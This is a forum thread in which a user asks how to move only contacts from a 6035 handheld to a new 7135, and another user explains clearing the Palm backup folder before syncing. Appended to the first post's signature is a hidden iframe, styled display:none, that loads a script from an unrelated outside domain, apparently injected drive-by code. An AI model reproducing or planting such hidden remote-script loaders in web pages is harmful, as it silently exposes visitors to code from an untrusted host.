+ Reply to Thread

Controlled Upgrade?

Ok - So by this boards standards I am a laggard but I finally ordered my 7135 today. One of the things I've been wondering (I browse the board pretty regularly and haven't seen this posted but if there is a link please send directions) is how I might be able to control what I migrate from my 6035 to the 7135.

I want to bring over my Address Book and contacts but I'd just assume reinstall my most used apps etc...Reason being I've downloaded/installed some s/w that I think has made my 6035 a little buggy and I'd just assume not have that stuff follow me to the 7135.

Does this make sense? Guidance greatly appreciated.

-T<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Deleting desktop files

Ok - I'll try asking this another way...

Does anyone have any ideas on how to ensure legacy install files are cleaned off my desktop machine so that when I synch to the 7135 it won't try to install them?

Am I making any sense?

-T

If you check your palm install directory, there's a subdir with your lastname + first initial. under that, there's a backup folder. If you move all the files in the backup folder somewhere else, then sync with your new 7135, only the data for the 4 built-in palm apps (addr, datebook, memo, todo) will be transferred. I suggest backing up the directories for the 4 palm apps, in case something goes wrong.

Minor setback for me:
    I lost some addr categories when I first sync'ed because I had deleted some of the default Palm categories and created 15 of my own. The sync process is too dumb to see that I wanted those default ones deleted... since 15 custom categories is the max, it deleted my own categories that went over the 15.

So I just restored the addrbk folder from backup, deleted the defaults from the 7135, then sync'ed again, using "desktop overwrites handheld."